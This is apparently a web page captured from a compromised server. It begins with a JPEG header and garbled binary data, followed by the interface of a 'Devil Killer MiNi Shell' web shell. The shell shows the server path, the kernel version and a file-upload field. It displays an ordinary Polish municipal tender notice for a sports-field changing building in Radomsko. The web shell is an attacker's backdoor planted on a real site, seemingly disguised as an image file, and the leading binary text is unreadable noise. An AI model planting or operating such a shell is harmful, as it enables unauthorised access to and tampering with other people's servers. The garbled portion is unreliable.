JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250721/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250721/0033595101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa budynku zaplecza szatniowo – sanitarnego przy boisku sportowym przy ul. Kukuczki w Radomsku” – etap I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Radomsko</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648238</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Tysiąclecia 5</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@radomsko.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.radomsko.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa budynku zaplecza szatniowo – sanitarnego przy boisku sportowym przy ul. Kukuczki w Radomsku” – etap I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f79ee082-ec0f-42a1-9a23-080dd5dcd3ed</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00335951</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00040664/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.27 Budowa zaplecza szatniowo-sanitarnego przy boisku sportowym przy ul. Kukuczki w Radomsku -etap I</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-f79ee082-ec0f-42a1-9a23-080dd5dcd3ed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze”(„Formularze do komunikacji”) pod<br/>adresem https://ezamowienia.gov.pl. link bezpośredni: w pkt 3.1 ogłoszenia o zamówieniu.<br/>2.Oferty należy złożyć za pomocą platformy e-Zamówienia<br/>https://ezamowienia.gov.pl/ w tym link bezpośredni w pkt 3.1 ogłoszenia o zamówieniu.<br/>3.Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB<br/>4.W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@radomsko.pl(maksymalny rozmiar przesyłanych plików 20 MB),z wyłączeniem składania ofert.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-<br/>Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz<br/>informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>2. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza).<br/>3. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz<br/>informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia -<br/>https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu .<br/>4. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do<br/>komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”) pod adresem https://ezamowienia.gov.pl. Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”).<br/>5. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail:<br/>zamowienia@radomsko.pl (maksymalny rozmiar przesyłanych plików 20 MB).<br/>6. Szczegółowe informacje w SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dotycząca RODO - szczegółowo określona w<br/>Rozdziale 24 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje dotycząca RODO - szczegółowo określona w<br/>Rozdziale 24 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZP.271.1.19.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 300528,08 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 160073,28 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1 Przedmiotem zamówienia jest wykonanie zadania pn „Budowa budynku zaplecza szatniowo – sanitarnego przy boisku<br/>sportowym przy ul. Kukuczki w Radomsku” – etap I Przedmiot zamówienia należy wykonać zgodnie z umową, dokumentacją<br/>projektową składającą się z projektów budowlanych, projektu technicznego objmującego branże architektonicznobudowlaną,<br/>sanitarną i elektryczną, projektu wykonawczego obejmującego branże architektoniczno-budowlaną, sanitarną i<br/>elektryczną oraz informacji uzupełniającej stanowiacej integralną część każdego z w/w projektów , specyfikacją techniczną<br/>wykonania i odbioru robót, uzgodnieniami, opinią geotechniczną, zasadami wiedzy technicznej i sztuki budowlanej.<br/>2.Przedmiotem zamówienia jest budowa budynku zaplecza szatniowo – sanitarnego przy boisku sportowym przy ul.<br/>Kukuczki w Radomsku (budynek kontenerowy) - etap I, która obejmie w szczególności:<br/>1) wykonanie robót geodezyjnych (wytyczenie, obsługa geodezyjna i inwentaryzacja geodezyjna powykonawcza);<br/>2) roboty przygotowawcze;<br/>3) budowę budynku zaplecza szatniowo – sanitarnego (budynek kontenerowy - 2 kontenery) wraz z elementami<br/>wskazanymi w dokumentacji projektowej (m. in. drzwi, okna, dach, podłogi, instalacje i przyłącza, oświetlenie zewnętrzne i<br/>wewnętrzne, wentylacja grawitacyjna i mechaniczna, wyposażenie, pochylnia dla osób niepełnosprawnych,);<br/>4) dostawę i montaż 4 szt. grzejników elektrycznych płytowych wypełnionych olejem roślinnym, pozwalającym uzyskać<br/>wysoką moc grzewczą na poziomie ok.700 W<br/>5) wykonanie instalacji kanalizacji sanitarnej zewnętrznej i wewnętrznej;<br/>6) wykonanie instalacji wodociągowej zewnętrznej i wewnętrznej;<br/>7) wykonanie instalacji elektrycznej zewnętrznej i wewnętrznej;<br/>8) wykonanie podejścia dla osób niepełnosprawnych;<br/>9) wyposażenie zaplecza szatniowo – sanitarnego w instalacje i urządzenia wskazane w dokumentacji projektowej.<br/>10) rozruch instalacji, dostarczenie instrukcji użytkowania, konserwacji i książki serwisowej wszystkich wymagających tego<br/>urządzeń wraz z harmonogramem niezbędnych przeglądów, przeprowadzenie szkoleń z obsługi, przeprowadzanie<br/>wymaganych przeglądów;<br/>11) wykonanie obowiązków zawartych w decyzjach, warunkach, uzgodnieniach, opiniach; w tym również tych które zostaną<br/>wystosowane przez gestorów sieci i zarządców dróg w trakcie realizacji przedmiotu zamówienia;<br/>12) uzyskanie pozwolenia na użytkowanie budynku.<br/>UWAGA: Przedmiot zamówienia nie obejmuje wykonania etapu II ( etapy zostały wskazane na rysunkach w projekcie<br/>technicznym i wykonaczym ) oraz dostawy i montażu wskazanych w dokumentacji projektowej klimatyzatorów ściennych<br/>oraz wykonania opaski wokół budynku.<br/>3. Szczegółowy opis przedmiotu zamówienia zawierają:<br/>1) wzór/projekt umowy - stanowiący dodatek nr 9 do SWZ ,<br/>2) Projekt budowlany– stanowiący dodatek nr 10 do SWZ,<br/>3) Projekt techniczny – stanowiący dodatek nr 11 do SWZ,<br/>4) Projekt wykonawczy – stanowiący dodatek nr 12 do SWZ<br/>5) Projekt budowlany przyłącza wodociągowego i przyłącza kanalizacji sanitarnej - stanowiący dodatek nr 13 do SWZ<br/>6) Informacja uzupełniająca stanowiąca integralną część każdego z w/w projektów- stanowiąca dodatek nr 14 do SWZ<br/>7) Specyfikacja techniczna wykonania i odbioru robót– stanowiący dodatek nr 15 do SWZ<br/>8) Opinia geotechniczna – stanowiąca dodatek nr 16 do SWZ<br/>9) Pozwolenie na budowę Decyzja nr 522/2024 z dnia 10 października 2024 r – stanowiąca dodatek nr 17 do SWZ.<br/>4. Ze względu na charakter wynagrodzenia (ryczałt) przedmiar robót stanowiący dodatek nr 18 do SWZ pełni funkcję<br/>informacyjną<br/>5. Zamawiający w opisie przedmiotu zamówienia zawartym w SWZ określił wymagania jakościowe odnoszące się do co<br/>najmniej głównych elementów składających się na przedmiot zamówienia, w tym w umowie, Projektach budowlanych,<br/>projekcie technicznym, wykonawczym wraz z infomacją uzupełniającą stanowiacą integralną część każdego z w/w<br/>projektów, Specyfikacji Technicznej Wykonania i Odbioru Robót.<br/>6. Zgodnie z art. 101 ust. 4 ustawy w sytuacji, gdyby w Dokumentacji projektowej lub Specyfikacjach technicznych, a więc w<br/>dokumentach opisującym przedmiot zamówienia, zawarto odniesienie do norm, ocen technicznych, aprobat, specyfikacji<br/>technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy, a takim<br/>odniesieniom nie towarzyszyło wyrażenie „lub równoważne”, to Zamawiający dopuszcza rozwiązania równoważne<br/>opisywanym w każdej takiej normie, ocenie technicznej, aprobacie, specyfikacji technicznej, systemowi referencji<br/>technicznych. W związku z powyższym należy przyjąć, że każdej: normie, ocenie technicznej, aprobacie, specyfikacji<br/>technicznej, systemowi referencji technicznych występujących w opisie przedmiotu zamówienia towarzyszą wyrazy „lub<br/>równoważne”. Jeżeli w Dokumentacji projektowej lub Specyfikacjach technicznych, użyto nazwy materiału(ów) lub<br/>urządzenia(ń), parametry identyfikujące producenta, pochodzenie, służą one jedynie do ustalenia charakterystyki, jakości<br/>tych materiałów lub urządzeń. Wykonawca ma obowiązek wbudować materiały lub urządzenia posiadające nie gorsze<br/>właściwości zapewniające zgodne z Dokumentacją projektową lub Specyfikacjami technicznymi funkcjonowanie elementów,<br/>części lub całego obiektu budowlanego. Tym samym dopuszcza się do stosowania przy realizacji zamówienia materiały lub <br/>urządzenia (ogólnie produkty) równoważne innych producentów. Jeżeli użyto w SWZ lub dodatkach wymogu posiadania<br/>certyfikatu wydanego przez jednostkę oceniającą zgodność lub sprawozdania z badań przeprowadzonych przez tę<br/>jednostkę jako środka dowodowego potwierdzającego zgodność z wymaganiami lub cechami określonymi w opisie<br/>przedmiotu zamówienia lub warunkach realizacji zamówienia oznacza, że Zamawiający akceptuje również certyfikaty<br/>wydane przez inne równoważne jednostki oceniające zgodność. Jeżeli wymagana jest określona etykieta, zamawiający<br/>akceptuje wszystkie etykiety potwierdzające, że dane roboty budowlane, dostawy lub usługi spełniają równoważne<br/>wymagania określonej przez zamawiającego etykiety.<br/>7.Określenie wymagań dotyczących zatrudniania przez wykonawcę lub podwykonawcę osób na podstawie stosunku pracy -<br/>szczegóły w SWZ.<br/>8.Zamawiający nie dopuszcza składania ofert częściowych.<br/>Uzasadnienie : Zadanie pn . „Budowa budynku zaplecza szatniowo – sanitarnego przy boisku sportowym przy ul. Kukuczki<br/>w Radomsku” – etap I jest podzielone na dwa etapy, części z których każda stanowi przedmiot odrębnego postępowania.Ze<br/>względu na charakter zamówienia oraz organizację, podział etapu I zamówienia na części jest bezzasadny i może utrudniać<br/>realizację przedmiotu zamówienia dla potencjalnego wykonawcy jak i nadzór nad jego realizacją przez Zamawiającego. Dla<br/>zagwarantowania bezsporności udzielonej gwarancji na roboty i rękojmi za wady obiektu, ich wykonanie powinno być<br/>realizowane przez jednego wykonawcę, który będzie odpowiedzialny za wykonanie całości niniejszego przedmiotu<br/>zamówienia. Podział realizacji etapu I zadania na poszczególne branże spowodowałby trudności realizacyjne, zwiększenie<br/>kosztów realizacji oraz ryzyko nieterminowego wykonania zamówienia, ponieważ wykonywanie robót poszczególnych branż<br/>przenika się wzajemnie i nie jest możliwe zakończenie robót jednej branży bez jednoczesnego wykonywania robót innej<br/>branży. Podzielenie przedmiotowego zamówienia na części groziłoby wystąpieniem nadmiernych trudności technicznych i<br/>konieczność koordynowania działań różnych wykonawców realizujących poszczególne części zamówienia na tym samym<br/>obiekcie, co mogłoby poważnie zagrozić właściwemu wykonaniu zamówienia. Tym samym przedmiot niniejszego<br/>zamówienia sam stanowi część zadania i nie został podzielony na części ze względów technicznych i ekonomicznych.<br/>Zakres i wartość szacunkowa zarówno etapu I jak i całego zadania wskazuje, że jest ono skierowane do podmiotów z<br/>Sektora Małych i Średnich Przedsiębiorstw Niepodzielenie przedmiotu – etapu I zadania na części nie naruszy zasady<br/>uczciwej konkurencji i nie spowoduje ograniczenia możliwości ubiegania się o zamówienie mniejszym podmiotom. Ponadto<br/>nie ograniczono udziału podwykonawców przy realizacji zamówienia. W związku z powyższym zachowując swobodę<br/>autonomicznego podejmowania decyzji przez Zamawiającego, stwierdzono że nie celowym byłoby podzielenie zamówienia<br/>na części, a więc realizacja zamówienia powinna być udzielona jednemu wykonawcy.<br/>9.Zamawiający przewiduje możliwości udzielenia zamówień, o których mowa w art. 305 pkt 1 w zw. z art. 214 ust. 1pkt7ustawy.- szczegóły w pkt 4.2.14.)<br/>10. Zamawiający przewidział, że istnieje możliwość, że o udzielenie zamówienia będzie ubiegał się podmiot, który był<br/>zaangażowany w przygotowanie postępowania o udzielenie tego zamówienia w zakresie opisu przedmiotu zamówienia,<br/>ustalenia wartości szacunkowej zamówienia.<br/>W związku z powyższym Zamawiający podjął następujące środki mające na celu zapobieżeniu zakłócenia uczciwej<br/>konkurencji w przypadku, o którym mowa w art. 85 ust. 1 ustawy:<br/>1) na stronie internetowej prowadzonego postępowania opublikował wszelkie dokumenty jakimi dysponuje dotyczące opisu<br/>przedmiotu zamówienia tj. dokumenty wymienione w pkt 3.3 SWZ,<br/>2) wyznaczył dłuższy termin na złożenie ofert,<br/>3) ujawnia wartość szacunkową zamówienia :<br/>- całkowita wartość całego zadania obejmująca etap I i etap II ustalona została na kwotę 300 528,08 zł netto (bez podatku<br/>VAT) w tym :<br/>- wartość etapu I 240 109,92 zł netto w tym :<br/>* wartość zamówienia podstawowego 160 073,28 zł netto<br/>* wartość zamówień polegających na powtórzeniu podobnych robót budowlanych lub usług: 80 036,64 zł netto<br/>- wartość etapu II 60 418,16 zł netto </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45212230-7 - Instalowanie szatni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45112210-0 - Usuwanie wierzchniej warstwy gleby</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45332300-6 - Roboty instalacyjne kanalizacyjne</p> <p class="mb-0">45332200-5 - Roboty instalacyjne hydrauliczne</p> <p class="mb-0">45332400-7 - Roboty instalacyjne w zakresie urządzeń sanitarnych</p> <p class="mb-0">45331211-8 - Instalowanie wentylacji zewnętrznej</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje możliwość udzielenia zamówień, o których mowa w art. 305 pkt 1 w zw. z art. 214 ust. 1 pkt 7 ustawy, polegających na<br/>powtórzeniu podobnych usług, robót budowlanych, zgodnych z przedmiotem zamówienia podstawowego tj. m. in. polegających na<br/>wykonaniu robót przygotowawczych, wykonaniu robót ogólnobudowlanych, robót branży sanitarnej, elektrycznej, dostawy i montażu<br/>kontenera szatniowego, wyposażenia, pod warunkiem, że wartość tych zamówień nie przekroczy łącznie wysokości 50 % wartości<br/>zamówienia podstawowego, a Zamawiający będzie dysponował środkami finansowymi na ich realizację, po negocjacjach z<br/>dotychczasowym Wykonawcą.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Dla porównania ofert Zamawiający przyjmie:<br/>a) cenę ryczałtową brutto obejmującą podatek od towarów i usług (z VAT) za wykonanie całości przedmiotu zamówienia – wg<br/>przypisanej wagi kryterium Ceny (C) tj. 80%<br/>i<br/>b) zadeklarowany okres gwarancji Wykonawcy (kryterium oceny ofert G) na cały przedmiot zamówienia w tym wykonane roboty oraz<br/>zastosowane materiały i urządzenia, licząc od podpisania protokołu odbioru końcowego przedmiotu zamówienia- wg przypisanej<br/>wagi kryterium Okres gwarancji Wykonawcy (G) 20%,</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji Wykonawcy (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 